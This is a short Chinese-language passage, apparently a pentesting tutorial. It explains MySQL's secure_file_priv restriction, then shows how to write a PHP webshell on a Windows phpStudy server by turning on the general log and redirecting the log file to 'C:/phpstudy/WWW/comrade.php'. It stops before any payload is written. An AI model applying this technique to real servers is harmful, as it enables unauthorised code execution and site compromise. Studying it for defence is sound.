MYSQL的secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。当secure_file_priv的值没有具体值时,表示不对mysql 的导入|导出做限制,如果是null,表示mysql不允许导入导出,图中表示mysql的导入和导出被限制在/var/lib/mysql-files/目录下
可以看到,无论是写还是读文件,都只能在/var/lib/mysql-files/下进行。
Windows下通过日志写shell
Windows下,show variables like '%secure%'
可以看到mysql不允许导入导出,直接写shell是不行的。然后可以看看log的位置,show variables like 'general_log%';,
可以看到phpstudy,因此猜测网站根目录是C:phpStudyWWW,接着,开启日志记录:set global general_log='on';然后再将日志文件导出到指定目录:set global general_log_file='C:/phpstudy/WWW/comrade.php';